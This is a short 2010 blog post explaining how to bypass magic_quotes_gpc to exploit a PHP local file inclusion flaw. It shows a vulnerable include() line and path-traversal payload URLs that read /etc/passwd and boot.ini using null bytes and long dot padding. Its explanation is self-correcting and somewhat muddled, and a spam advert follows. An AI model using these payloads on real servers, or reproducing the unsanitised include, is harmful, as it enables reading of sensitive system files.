Local File Inclusion with Magic_quotes_gpc enabled

February 2, 2010

So, lets look at a piece of code:

<?php include(‘inc/’.$_GET[‘page’].’php’); ?>

Normally, you would use the null byte (%00) to exploit it:

vuln.php?page=../../../../../etc/passwd%00

but if magic_quote_gpc is enabled than the null byte(%00) will get converted to /0, implying that the attack will fail.

How to bypass this: it you add a large number of dots (…..) than the null byte will not get escaped null byte is not required. e.g.

vuln.php?page=../../../../../etc/passwd%00……………………………………………………………………..(200 dots in this case)

vuln.php?page=../../../../../etc/passwd……………………………………………………………………..(200 dots in this case)

Correction: You don’t need null byte here.

Update: As pointed out by Bodgan, this only works for windows. So replace /etc/passwd with /../../boot.ini. I will provide a POC link

tested on php version: 5.2.12 (wamp environment)

References: http://www.xakep.ru/post/50862/novaya_veha_v_teorii_include.rar
———————-
Advert: Download icnd training material from testking and guarantee pass your HP0-J33 as well as HP0-J34 exams on first jump.

Comments

10 Comments

2 Trackbacks

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback